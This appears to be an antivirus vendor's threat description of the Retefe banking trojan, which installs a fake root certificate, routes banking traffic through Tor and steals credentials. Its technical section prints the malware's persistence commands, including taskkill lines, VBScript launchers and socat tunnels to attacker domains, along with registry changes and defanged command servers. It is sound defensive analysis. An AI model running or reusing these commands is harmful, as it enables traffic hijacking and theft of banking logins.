Trojan-Spy:JS/Retefe

Classification

Malware

Trojan-Spy

JS

Malware.JS/Retefe.vpkoo

Summary

Retefe is a banking trojan that redirects its victim to a fake or a phishing banking URL in order to steal login credentials.

It installs a fake root certificate and a Tor client on the victim’s machine and change the network proxy which resulted in the victim being redirected to a fake banking URL through the Tor network when visiting certain banking URLs.

Removal

Automatic action

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

Suspect a file is incorrectly detected (a False Positive)?

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest detection database updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    NOTE If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note You need administrative rights to change the settings.

For more Support

Community

Find the latest advice in our Community.

User Guide

See the user guide for your product on the Help Center.

Contact Support

Chat with or call an expert for help.

Submit a sample

Submit a file or URL for further analysis.

Technical Details

Retefe’s source code which was written in JavaScript was compiled in Microsoft Visual C/C++ to render it executable.

Upon execution, Retefe will install a fake root certificate and a Tor client, and then change the proxy and internet settings on the infected machine

Infection Vector

Retefe typically gets into a system when the victim inadvertently opens a malicious file attachment that arrives via a spam email.

Behavior

Install root certificate:

Retefe has been found to install a fake root certificate with sha1: a0050ba4163e64178600f0970a2cad9b2c13088b onto the machine it infected.

Terminate processes:

Once the certificate has been installed, it terminates processes used by web browsers using the following command:

  • taskkill /F /im iexplore.exe
  • taskkill /F /im firefox.exe
  • taskkill /F /im chrome.exe
Create task scheduler:

To achieve persistence, Retefe creates automated tasks with random names in Task Scheduler containing these values:

  • vbscript:close(CreateObject("WScript.Shell").Run("tor.exe",0,False))
  • s1cmd='socat tcp4-LISTEN:11290,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050'; vbscript:close(CreateObject("WScript.Shell").Run("$s1cmd ",0,False))
  • $s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050'; vbscript:close(CreateObject("WScript.Shell").Run("$s2cmd ",0,False))
Create shortcut files:

It also creates the following shortcut files in the startup folder:

  • msword.lnk
    • Target: vbscript:close(CreateObject("WScript.Shell").Run("tor.exe",0,False))
  • acrobat.lnk
    • Target:vbscript:close(CreateObject("WScript.Shell").Run("socat tcp4-LISTEN:11290,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:80,socksport=9050 ",0,False))
  • sync.lnk
    • Target: vbscript:close(CreateObject("WScript.Shell").Run("socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:%DOMAIN%:5588,socksport=9050 ",0,False))
Create and upload log file:

Retefe creates a log file which it then uploads to an external server.

  • File : $Logfile = $env:ALLUSERSPROFILE+"\\SP_$(gc env:computername).log
  • External server : hxxp://jxa43tf73eg34flp[.]tor2web. xyz/

The log file contains the following information:

  • Operating system
  • PowerShell version
  • AutoConfigURL status
  • Certificate (installed or not)
  • LOCALAPPDATA location
  • Antivirus product
Dropped files:

Retefe drops these files into C:\\ProgramData\:

  • 7za.exe: 7zip executable which is used to extract the dropped 7z files.
  • ts.7z: Contains Microsoft.Win32.TaskScheduler.dll third-party software applications to programmatically manage Windows scheduled tasks.
  • tor.7z: Tor file to make the connection anonymous.
  • socat.7z: Tool for transferring data between two addresses
Set proxy auto-config:

The URL is specified to:

  • hxxp://127.0.0[.]1:11290/{0}.js?ip={1}
Check the IP address:

It checks for these IP address on the victim’s machine:

  • hxxp://api[.]ipify[.]org
  • hxxp://icanhazip[.]com
Registry Changes:
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL:
    • Data: "hxxp://127.0.0[.]1:11290/{0}.js?ip={1}"
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect":
    • Data: 0
Network Activities:

Domains used in Tor communication:

  • wysq6o3r64d46bnn[.]onion
  • zw4lhcf756v5e4nq[.]onion
  • g5nhdiv4ooiiozxo[.]onion
  • 547iv7ubbdndxdna[.]onion
  • oxxavr4m4vpup4sa[.]onion

Analysis by: Fairuz Zainor

Date Created: 11/10/2019

Date Last Modified: -